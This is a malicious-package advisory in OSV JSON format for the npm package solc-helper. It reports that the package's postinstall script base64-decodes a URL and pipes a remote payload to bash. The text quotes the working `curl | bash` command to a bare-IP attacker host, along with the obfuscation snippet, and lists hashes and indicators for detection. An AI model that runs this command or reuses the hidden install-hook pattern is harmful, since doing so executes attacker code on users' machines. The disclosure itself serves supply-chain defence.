{"id":"MAL-2026-3715","summary":"Malicious code in solc-helper (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2016baa4fe29c296464b8381f88440457a113d79e2773d2252eb609a15ea2e03)\npackage.json's postinstall lifecycle script runs `node -e` to base64-decode a hidden URL and pipe its contents to bash: `curl -s http://8.217.75.147:3000/payload | bash`. The URL is obfuscated via `Buffer.from('aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=','base64').toString()` which decodes to `http://8.217.75.147:3000/payload`. Every `npm install solc-helper` triggers this unattended download-and-execute of attacker-controlled shell code from a bare IP over plaintext HTTP, with no integrity check. Multiple independent block signals stack: bare-IP C2, plaintext HTTP, base64-obfuscated URL inside a lifecycle hook, `curl | bash` pattern, and no legitimate functionality advertised by the package to justify any network activity.\n\n## Source: ossf-package-analysis (ddd32c477334047130051f655031a49e899c68da7dbeff001a98efb7e25afa2a)\nThe OpenSSF Package Analysis project identified 'solc-helper' @ 2.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-15T07:50:44.882891Z","published":"2026-05-13T12:00:42Z","database_specific":{"malicious-packages-origins":[{"versions":["2.0.0"],"sha256":"ddd32c477334047130051f655031a49e899c68da7dbeff001a98efb7e25afa2a","source":"ossf-package-analysis","modified_time":"2026-05-13T12:00:42Z","import_time":"2026-05-13T21:58:24.49715736Z"},{"id":"IN-MAL-2026-002695","sha256":"2016baa4fe29c296464b8381f88440457a113d79e2773d2252eb609a15ea2e03","source":"amazon-inspector","modified_time":"2026-05-14T19:25:10Z","import_time":"2026-05-15T07:37:17.054641889Z","versions":["1.0.0"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/solc-helper/v/1.0.0"}],"affected":[{"package":{"name":"solc-helper","ecosystem":"npm","purl":"pkg:npm/solc-helper"},"versions":["2.0.0","1.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/solc-helper/MAL-2026-3715.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-6K4aF0XRJw+4oqjkvyVgK/IJbV5JufKivq5z++nBfIKeSgCFUr4PtOljY3Qh4UF6EzUOASO/RTNMwi+Emq6e7g==","sha1":"df7378697f436229fa269a3cc53fbdbb60d3352d"},"filename":"solc-helper-1.0.0.tgz"}],"domains":["http://8.217.75.147:3000"],"evidence_files":[{"sha256":"e98768980e89ef8b154822f462727527155607e496dc678e35f1a19b149b4607","path":"package.json","tlsh":"f8e0ab109b106ab318c09e930e5b86cb6073881b01187c58a34be02c039c6bb15fb91e"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}